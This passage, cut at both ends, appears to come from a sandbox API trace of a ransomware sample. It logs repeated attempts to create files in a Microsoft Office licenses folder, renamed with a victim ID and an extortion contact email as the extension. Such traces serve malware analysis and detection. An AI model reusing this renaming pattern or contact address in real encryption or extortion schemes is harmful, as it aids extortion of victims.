dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.302] CloseHandle (hObject=0x514) returned 1 [0164.302] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.302] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.303] CloseHandle (hObject=0x514) returned 1 [0164.303] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.303] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.304] CloseHandle (hObject=0x514) returned 1 [0164.304] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.304] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.305] CloseHandle (hObject=0x514) returned 1 [0164.305] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.305] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.306] CloseHandle (hObject=0x514) returned 1 [0164.306] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.307] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.307] CloseHandle (hObject=0x514) returned 1 [0164.307] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.307] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.308] CloseHandle (hObject=0x514) returned 1 [0164.308] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.308] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.309] CloseHandle (hObject=0x514) returned 1 [0164.310] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.310] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.310] CloseHandle (hObject=0x514) returned 1 [0164.311] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.311] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.311] CloseHandle (hObject=0x514) returned 1 [0164.312] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.312] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.312] CloseHandle (hObject=0x514) returned 1 [0164.313] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.313] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.313] CloseHandle (hObject=0x514) returned 1 [0164.314] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.314] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.314] CloseHandle (hObject=0x514) returned 1 [0164.315] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.315] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.315] CloseHandle (hObject=0x514) returned 1 [0164.316] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.316] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.319] CloseHandle (hObject=0x514) returned 1 [0164.320] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.320] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.321] CloseHandle (hObject=0x514) returned 1 [0164.321] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.321] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.322] CloseHandle (hObject=0x514) returned 1 [0164.322] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.322] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.323] CloseHandle (hObject=0x514) returned 1 [0164.323] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.323] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.324] CloseHandle (hObject=0x514) returned 1 [0164.324] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.325] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.325] CloseHandle (hObject=0x514) returned 1 [0164.326] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.326] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.326] CloseHandle (hObject=0x514) returned 1 [0164.327] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.327] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.327] CloseHandle (hObject=0x514) returned 1 [0164.328] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.328] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.328] CloseHandle (hObject=0x514) returned 1 [0164.329] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.329] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.695] CloseHandle (hObject=0x514) returned 1 [0164.696] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.696] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.696] CloseHandle (hObject=0x514) returned 1 [0164.697] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.697] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.697] CloseHandle (hObject=0x514) returned 1 [0164.698] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.698] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.698] CloseHandle (hObject=0x514) returned 1 [0164.701] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.702] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.702] CloseHandle (hObject=0x514) returned 1 [0164.703] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.703] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.703] CloseHandle (hObject=0x514) returned 1 [0164.704] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.704] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.704] CloseHandle (hObject=0x514) returned 1 [0164.705] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.705] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.705] CloseHandle (hObject=0x514) returned 1 [0164.706] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.706] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.706] CloseHandle (hObject=0x514) returned 1 [0164.714] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: 